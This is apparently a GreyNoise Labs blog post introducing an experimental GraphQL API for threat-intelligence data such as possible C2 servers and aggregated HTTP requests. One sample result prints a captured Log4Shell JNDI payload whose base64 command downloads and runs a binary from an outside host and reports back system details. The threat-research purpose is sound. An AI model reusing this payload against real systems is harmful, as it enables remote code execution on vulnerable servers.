Labs GraphQL API

Experimental GraphQL API that exposes snippets of the GreyNoise data lake
api
cybersecurity
graphql
Author

Matt Lehman

Published

April 19, 2023

This is an experimental blueprint service available at https://api.labs.greynoise.io. This authenticated GraphQL API opens up a whole new world of possibilities, exposing queries that tap into the vast data lake of GreyNoise.

We’re excited to see how our users will engage with this data and discover new use cases. To get started, you’ll need to sign up for a GreyNoise account here to authenticate to the Labs API.

For the latest queries and examples, make sure to check out our comprehensive documentation.

Please note that this is a blueprint and not intended for direct use in production or critical workflows. While we haven’t released any client SDKs at this time, the schema introspection is enabled, allowing others to quickly build their own experimental tools if they wish.

Ready to dive in? Click Here to get started.

Availability

This is a free, experimental API. There are no gurantees to it’s availability, performance, or longevity. The team intends to build in scheduled deprecation to new queries that will be captured in the documentation. This is so we can focus on continually enabling new functionality and determining how useful this functionality is to determine if it warrants becoming a production endpoint/query.

Limits

For each available query, this API exposes only a percentage of the most useful results. Additionally, this API has a rate limit that is captured in the documentation site.

Queries

Currently this API exposes three primary sources of data. The request and response formats are likely to change a bit for this first release as we tweak a bit so please reference the generated documentation above over any examples within this article.

Possible C2s

A list of possible C2s along with extracted domains, IPs, the original payload, and metadata about these potential C2s to provide context on pervasiveness and rate.

QUERY

query listC2s {
  listC2s {
    c2_domains
    c2_ips
    hits
    payload
    pervasiveness
    source_ip
  }
}

RESULTS (truncated)

{
  "source_ip": "95.214.55.244",
  "c2_domains": [
    "[]"
  ],
  "c2_ips": [
    "[129.151.84.124]"
  ],
  "hits": 2599,
  "payload": "GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0",
  "pervasiveness": 18
}

HTTP Requests

An aggregation of HTTP request paths/bodies/useragents along with metadata about these requests to provide context on a payloads pervasiveness and rate.

QUERY

query HTTPRequests {
  listHTTPRequests {
    date
    method
    path
    pervasiveness
    request_headers
    request_count
    source_ip_count
  }
}

RESULTS (truncated)

{
  "data": {
    "listHTTPRequests": [
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/hudson",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 zgrab/0.x]",
        "request_count": 3063,
        "source_ip_count": 146
      },
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)]",
        "request_count": 18023,
        "source_ip_count": 54
      }
    ]
  }
}

Helpful Hints

You can clear out the existing query and then navigate to the query explorer on the left hand side and create a new query with point & click.

query-explorer

If you prefer to live in the CLI you can use Copy as cURL on the left hand side under the tool panel. This will also copy your current authentication header which will expire after a set period of time. You can just log back into the API to get a new one.

curl

After a query finishes in the Playground you can download the JSON results on the bottom right.

download